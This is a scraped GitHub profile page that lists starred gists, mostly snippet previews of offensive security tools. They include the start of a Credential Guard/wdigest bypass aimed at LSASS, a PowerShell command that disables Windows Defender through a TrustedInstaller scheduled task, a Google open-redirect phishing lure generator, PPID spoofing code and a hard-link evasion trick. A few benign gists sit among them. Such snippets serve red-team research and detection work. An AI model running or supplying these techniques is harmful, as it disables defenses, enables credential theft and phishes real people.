Skip to content

Instantly share code, notes, and snippets.

View byt3bl33d3r's full-sized avatar
🧛
This shit ain't nothing to me man

Marcello byt3bl33d3r

🧛
This shit ain't nothing to me man
7k followers · 216 following
View GitHub Profile
@N4kedTurtle
N4kedTurtle / CredGuard_PoC
Created August 25, 2020 14:17
PoC for enabling wdigest to bypass credential guard
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
@tyranid
tyranid / doh.ps1
Created May 4, 2020 15:17
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@mattifestation
mattifestation / StreamNotes_04212020.md
Created April 21, 2020 23:25
Twitch Stream Notes 04/21/2020 - Obfuscated Script-based Malware Analysis with the Anti-Malware Scan Interface (AMSI)
@ustayready
ustayready / google_lure.py
Last active September 23, 2024 20:18
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
@rasta-mouse
rasta-mouse / PPID Spoof & BlockDLLs
Last active April 1, 2025 22:39
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@gteissier
gteissier / tcpdump.py
Created December 14, 2019 15:19
Pythonic tcpdump: copy, paste, and enjoy
#!/usr/bin/env python
'''
It has been tested with either py2 or py3.
Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK
or the memory mapped ring buffer.
BPF filter listed below is compiled form of "not port 22"
if you want to change it, do something like
@billimek
billimek / README.md
Last active November 3, 2023 14:25
vault transit auto-unseal

Dual vault servers that unseal each-other with transit seal type

Instructions inspired from auto unseal with transit guide

Prerequisites

  • Docker
  • vault CLI

1. Bootstrap first vault server

@chriswayg
chriswayg / Ubuntu_Debian_Cloud_images_in_Proxmox.md
Last active April 11, 2025 10:35
Ubuntu and Debian Cloud images in Proxmox
@djhohnstein
djhohnstein / Update_Notes.md
Created August 5, 2019 21:50
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@TheWover
TheWover / Update_Notes.md
Created August 5, 2019 13:14
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html